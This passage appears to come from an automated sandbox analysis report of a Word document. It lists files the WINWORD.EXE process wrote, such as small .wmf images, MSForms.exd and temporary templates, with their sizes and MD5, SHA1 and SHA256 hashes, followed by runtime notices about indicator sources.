- 5af21f3e27e97172e6af2fd9d770ef74a02f3409
- SHA256
- e8d46121e4581e06e0ca6001f0f3972ce869426303b283105d3575c9cd3d6988
-
849394EC.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- fcd5e5a27e4fe59edcd4e74e6e1fc729
- SHA1
- 6c0d2fa4ce5895b55cb0b2f496bd5c6fef3cbce8
- SHA256
- 83fe77a98a9d4e89dfb299032ad649d9f1f78c10735edc7a81d1a318598685b1
-
85992E05.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- 9481225aa5048f311185c933eb4f4008
- SHA1
- 5f377d6ab7c5bcf1675f87c8a8e498bea443f981
- SHA256
- 2a38872652f7c782f149d659581288a5069b9139d24f067c723c64422277a2bb
-
8785896.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- fcd5e5a27e4fe59edcd4e74e6e1fc729
- SHA1
- 6c0d2fa4ce5895b55cb0b2f496bd5c6fef3cbce8
- SHA256
- 83fe77a98a9d4e89dfb299032ad649d9f1f78c10735edc7a81d1a318598685b1
-
98416121.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- d411a7b9c1c119b18ceb340548ba3ee9
- SHA1
- 6b6c3405ddfae2c5ad1905f6567b80057f9b6217
- SHA256
- 2e209505cd516d11823ad079d29004e05c2f2c4ffaf0dacbe7091ec9f19ba856
-
B231C914.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- fcd5e5a27e4fe59edcd4e74e6e1fc729
- SHA1
- 6c0d2fa4ce5895b55cb0b2f496bd5c6fef3cbce8
- SHA256
- 83fe77a98a9d4e89dfb299032ad649d9f1f78c10735edc7a81d1a318598685b1
-
C2DA935B.wmf
- Size
- 444B (444 bytes)
- Type
- unknown
- Description
- ms-windows metafont .wmf
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- 785fb0221ebb6645e2a5977227aa9ad2
- SHA1
- 20b5e55690f21c3aec2c8ea0e7cca0993071e1b3
- SHA256
- ddf81e4172c73ce5c8ccea7d144c6bf6be6744f23538442119493d891fffb3f8
-
MSForms.exd
- Size
- 163KiB (166724 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3988)
- MD5
- 07502c2da8eda4a6e7a21ade632d8614
- SHA1
- acf14bbf929e15140f775443c10adf02864a8e38
- SHA256
- d8b640d1458fae20f925259aa71ef436eb5e5843e8df199a9297c9e28cb37f65
-
~WRS_1A55B392-6FBE-4E4D-8194-2A5527168528_.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~_Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
Notifications
-
Runtime
- Network whitenoise filtering was applied
- Not all IP/URL string resources were checked online
- Not all sources for indicator ID "api-1" are available in the report
- Not all sources for indicator ID "api-51" are available in the report
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "binary-0" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report